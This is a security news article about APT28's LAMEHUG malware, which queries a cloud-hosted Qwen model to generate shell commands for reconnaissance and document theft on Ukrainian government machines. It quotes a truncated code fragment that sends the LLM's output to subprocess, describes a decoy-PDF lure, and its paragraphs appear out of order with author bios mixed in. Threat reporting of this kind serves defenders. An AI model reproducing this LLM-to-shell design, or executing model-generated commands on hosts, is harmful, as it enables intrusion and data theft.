The newly revealed LAMEHUG campaign signals a watershed moment for cyber-def: Russian state-aligned APT28 has fused a large language model (LLM) directly into live malware, allowing each infected host to receive tailor-made shell commands on the fly. CATO Networks analysts who reverse-engineered multiple samples quickly identified the malware’s hallmark: every binary embeds base64-encoded prompts that are sent verbatim to the cloud-hosted LLM, which then returns an executable command string tailored to the host environment. def LLM_QUERY_EX(): prompt = {'messages': [{'role': 'user', 'content': b64decode(prompt_b64_p1).decode()}], 'temperature': 0.1, 'model': 'Qwen/Qwen2.5-Coder-32B-Instruct'} cmd = query_text(prompt) subprocess. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news. Cyber Security News is a Dedicated News Platform For Cyber News, Cyber Attack News, Hacking News & Vulnerability Analysis. Second, prompt editing grants the operators instant control over reconnaissance depth and exfiltration scope without redeploying code, a boon for rapidly shifting operational requirements. By delegating command synthesis to the cloud model, the binary remains compact, and any blue-team attempt to pattern-match on hard-coded strings is defeated. Unless defenders monitor outbound AI queries or impose least-privilege egress rules, LAMEHUG’s modular architecture guarantees the operators fresh system insight with every execution cycle. By invoking the Qwen2.5-Coder-32B-Instruct model through Hugging Face’s public API, the attackers sidestep traditional static payload constraints and achieve unprecedented flexibility. Tushar is a Cyber security content editor with a passion for creating captivating and informative content. A second prompt follows, ordering the recursive collection of Office, PDF, and TXT files from the user’s Documents, Downloads, and Desktop directories into the same staging folder. Early telemetry shows Ukrainian government workstations were the initial testbed, reinforcing long-standing observations that APT28 often pilots experimental tooling against Kyiv before wider use. Once opened, a decoy PDF appears while the hidden binary executes in the background, ensuring the victim remains unaware of the breach.
This Cyber News was published on cybersecuritynews.com. Publication date: Thu, 24 Jul 2025 16:55:22 +0000